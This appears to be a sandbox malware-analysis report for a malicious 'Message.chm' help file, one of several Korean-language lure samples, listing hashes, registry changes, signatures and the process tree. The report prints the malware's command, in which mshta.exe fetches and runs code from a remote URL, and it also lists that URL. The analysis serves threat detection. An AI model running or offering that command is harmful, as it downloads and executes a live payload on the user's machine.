Overview
overview
10Static
static
8LG유플....html
windows7-x64
1LG유플....html
windows10-2004-x64
1LG유플...ml.lnk
windows7-x64
10LG유플...ml.lnk
windows10-2004-x64
10MAIL_20230...02.chm
windows7-x64
10MAIL_20230...02.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Message.chm
windows7-x64
10Message.chm
windows10-2004-x64
10Analysis
-
max time kernel
120s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:32
Behavioral task
behavioral1
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LG유플러스_이동통신_202208_이_선.html
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
LG유플러스_이동통신_202208_이_선.html.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
MAIL_20230125151802.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
MAIL_20230125151802.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral7
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
Message.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
Message.chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
Message.chm
Resource
win10v2004-20230220-en
General
-
Target
Message.chm
-
Size
23KB
-
MD5
a2a8094933150e18fb31f24b5e20643b
-
SHA1
e4a2958358b33ad814828efeaa6295eb46510599
-
SHA256
c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
-
SHA512
24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
-
SSDEEP
384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/7.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 25 388 mshta.exe -
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "525" hh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1120 hh.exe 1120 hh.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
hh.exedescription pid process target process PID 1120 wrote to memory of 388 1120 hh.exe mshta.exe PID 1120 wrote to memory of 388 1120 hh.exe mshta.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\INISAFEMailv4[1].cabFilesize
2.2MB
MD58abb4e13ee3f94df4b5e276ef6cb0144
SHA1819db68fcd5a8673383c82898b729f16b77054d2
SHA256c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61
SHA512f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930
-
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.infFilesize
538B
MD510418288c546673054c4bd83220ffeef
SHA1b179588f320e234899a101ecd651bd024569d8bc
SHA256eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971
SHA512a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160